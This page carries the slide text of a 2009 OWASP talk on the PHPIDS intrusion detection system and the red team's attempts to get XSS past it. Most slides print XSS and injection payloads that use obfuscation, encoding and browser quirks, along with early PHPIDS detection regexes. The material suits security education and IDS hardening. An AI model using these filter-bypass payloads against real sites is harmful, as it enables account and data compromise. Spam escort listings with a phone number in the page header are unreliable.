EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 

The Ultimate IDS Smackdown

  • 1. A hopefully amusing and edutaining talk by  Gareth Heyes and Mario Heiderich  for OWASP London, 07.2009
  • 2. Who are we? Gareth Heyes Founder of Businessinfo web security Contracts for Microsoft testing the XSS filter Creator of Hackvertor & other security tools Enjoys hacking Javascript  Mario Heiderich  Co-founder and lead-dev of the PHPIDS Websecurity and secure development geek CTO for Business IN Inc. Freelance security researcher Believes in the infinite power of markup
  • 3. What... is this talk? A short intro in the PHPIDS A travel from the very beginning to today's state Accompanied by a constant state of "being owned" ...positive ownage  ...and details on the ownage Some words on red vs. blue situations in (web) security And a conclusion that maybe might  ... change or view on web security  ... help some to get out of their boxes ... and discover values greater than proprietary And ... a rather dirty and sweaty cage fight
  • 4. In the blue corner... Announces a new IDS approach  Thinks it knows the web after years of experience Did read a lot of PDFs about the interwebs - even clicked once or twice on what appeared to be a link. 
  • 5. In the red corner... Thinks blue team is crazy Doubts that blacklists can detect attacks Placed the malicious link the blue team courageously clicked on Was told by (had to be removed) in a dream it knows everything Likes the Matrix
  • 6. Some history lessons First PHPIDS version - the 0.0.1  from 03/2007 (["|'][s]*>) //finds html breaking injections including whitespace attacks (["|'][s]*<) //finds attribute breaking injections including whitespace attacks (+A[w]{2}-) //finds utf7 attacks in general (&#[w]+) //detects all entitites including the bizarro IE US-ASCII entitites ([w]{3}) //detects the IE hex entities (("|')[s]*()|})) //finds closing javascript breaker including whitespace attacks (((|{)[s]*("|')) //finds opening javascript breaker including whitespace attacks (../..) //detects basic directory traversal (%[w]{2}) //detects urlencoded attacks (=//) //detects protocol relative url inclusions (¼/) //detects US-ASCII HTML breaking code (@import|;base64|alert() //detects imported poisoned stylesheets, base64 attacks and all alerts (>[w]=/) //detects malformed attribute utilizing script includes ((?<)|()>)) //detects nullparam and numeric includes Receives sympathy bonus for being so adorable!  It didn't even have a name back then...
  • 7. Any good fighter requires the right tools Enter the PHP Charset Encoder Converts charsets Encoding and conversion Entities & lots of them Is it enough? Hackvertor Inspired by the PCE Layered encoding Tag based conversion JS fuzzing & testing Enables crazy vector creation
  • 8. Lets get ready to rumble....
  • 9. First round of the fight It didn't look too bad for the blue team Life was easy back them Some simple "><script>alert(/XSS/)</script> And a little bit of 'OR1=1-- The simple and bright world of kindergarten-level injections If we don't know obfuscation, it does not exist!    But then...
  • 10. Inside the script tag Sirdarckcat's innocent question:-   "Why not detect all forms of attack? Insert a script tag and detect malicious code" The blue team said yes... All hell broke loose...
  • 11. It all began with strings s1=''+"jav"+'';s2=''+"ascri"+'';s3=''+"pt"+''; s4=''==''?':': 0;s5=''+"aler"+'';s6=''+"t"+'';s7=''==''?'(1)': 0;s8=s1+s2+s3+s4+s5+s6+s7;URL=s8 _=alert,1,1,_(1); c4=1==1&&'(1)';c3=1==1&&'aler'; c2=1==1&&':';c1=1==1&&'javascript'; a=c1+c2+c3+'t'+c4;(URL=a);
  • 12. How many ways to create a string? Single/double quotes Regular expressions Arrays are strings Array constructors are strings Firefox specific hacks Backslash multiline strings DOM properties galore E4X Octal, unicode hex Escapes
  • 13. alert(1) examples Octal, hex and Unicode escapes:- '141154145162164506151' 'x61x6cx65x72x74x28x31x29' 'u0061u006cu0065u0072u0074u0028u0031u0029' RegExps:- /alert(1)/.source /alert(1)/[-1] // FF only E4X:- <>&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;</> <>&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;</>
  • 14. Browser bugs are your friend Firefox 2 supported encoding of parenthesis using unicode escapes. alert(1)== u0061u006cu0065u0072u0074u0028u0031u0029 E4X - every object has e4x properties! Bug? (!1..@*::abc?alert:1..@*::xyz)(1) Eval method linked to every object, that was fun (0)['eval']('alert(1)') Data URLs used to inherit domain injected on - sometimes they still do
  • 15. So - what to do at this point? What do you say blue team? Give up? Or.. maybe...give up? Or... Face the problem and canonicalize!
  • 16. We chose... The latter Because of the breast-hair (native - not implanted). And introduced the Converter That was around late spring 2008 May 2008 to precise in rev .899 We could now convert and canonicalize the strings before hitting the rules Keeping the core rules slim - and the blue team prepared for more vector madness
  • 17. Time for entity and encoding fun.... Oh noez - the red team reacts! Malformed entities Zero padded Mixed hex/dec Encoded data urls Base64 - fun fact: that really generated headaches for the blue team Unexpected unicode characters Unicode spaces  Allowed padding   a&#8205lert(1) // FF2 stuff ale&zwj;rt(1) // Zero width joiner FF2
  • 18. Entity fun continued.... Double encoded entities <isindex/type=image xyz=&lt; iframe/src=javascript&amp;#x3a&amp; #x61lert&amp;#x28&amp;#x31&amp;#x29&gt; onerror=undefined,///,outerHTML=xyz src=1> <img title=javascript:&amp;#97lert(1) src="x" alt="y"onerror=undefined,[undefined, [UR&#76&#61title],undefined]>
  • 19. Forgotten features Getters/Setters  o={b setter:Function}.b='alertx28x31x29'; new o Language attribute IE  <body/id="1"onload=MsgBox+"xss" language=vbs> Data Islands, HTC, HTA... Ways to change the location  Detect location=name w/o false alerts for a start JS based CSS expressions document.styleSheets(0).cssText=name HTML encoded comments in javascript! <body onload=&lt;!--&#10alert(1)>
  • 20. Pre-implemented future features and standards Video/Audio tags New events onurlflip, ononline, onbounce, oncellchange... CSS Expression closures Array extras New String functions E4X self injecting vectors - Bypasses Mozilla CSP <html><head> <title>CSP e4x injection</title> <script src="#"></script> </head><body>{alert(1)}</body></html>
  • 21. JavaScript is weird Math operations on functions +alert(1);alert(1)++;.1.*in<></>in{}in[] in~alert('mmmmm js weirdness')++in~[] Strings out of large numbers top[(Number.MAX_VALUE/45268).toString(36). slice(15,19)]((Number.MAX_VALUE/99808). toString(36).slice(71,76)+'("XSS")') Getting window (0,[].sort)();(1,[].reverse)();// FF only Yosuke Hasegawa script without a-z0-9  (Å='',[Ç=!(µ=!Å+Å)+{}][Ç[ª=µ[++Å]+µ[Å-Å],È=Å-~Å]+Ç [È+È]+ª])()[Ç[Å]+Ç[Å+Å]+µ[È]+ª](Å) Expressions <div style="00078073 s:e&#92&#120p&#47;&#42;&#106;&#42;&#47; 0007200065 ssion(window.x?0:(alert(/XSS/),window.x=1));"></div>
  • 22. Ssso, what did we learn today
  • 23. You'll never get what you expect Defending against the stuff you know doesn't make you safe Web technologies are rocket science, browsers are monsters Building an IDS is no fire and forget job
  • 24. Web technologies aren't pandora's box... they just support it too
  • 25. An IDS is a constantly evolving middleware Cover the RFCs, brower capabilities, web app peculiarities, encoding quirks, application bugs, etc. etc. There is no golden path to stride on Long release cycles are a no-go Stable trunk versus monthly releases
  • 26. Community IDS versus commercial products Where are the smoketests, where are the challenges Where's the hive mind knowledge Utilizing pressure for better product quality Faster fixes New approaches Better communication with users amd attackers And a lot of WAFs with questionable XSS protection  No vendor names.. no worries :) WafW00f, XSS on vendor sites, obvious circumventions
  • 28. Maybe... Security - especially web sec is no lone wolf mission Locking away the rules and best practices don't always work Without community support it's hard to create a grown and capable product Link with the attackers
  • 29. Generate communities  and challenges It's a win-win anyway The vulnerabilities are in the design - patches can't heal the patient Give credit and admit that 100% security just ain't possible Spread knowledge to avoid having it wither
  • 30. Credits Talking about credits  Thanks to  Christian, Lars, sdc, thornmaker, ma1, lightos, Reiners, Kishor, Martin Hinks,tx, rvdh, beford, the Schokokeks team and all the other people who helped building, attacking and hardening the PHPIDS... And why not give us a small visit http://php-ids.org http://thespanner.co.uk http://sla.ckers.org/forum/list.php?24
  • 31. That's it for now - thanks!   Red team couldn't resist.....   Image() . ownerDocument . documentElement . innerHTML+=name The red team - attempting to infiltrate the blue team's camp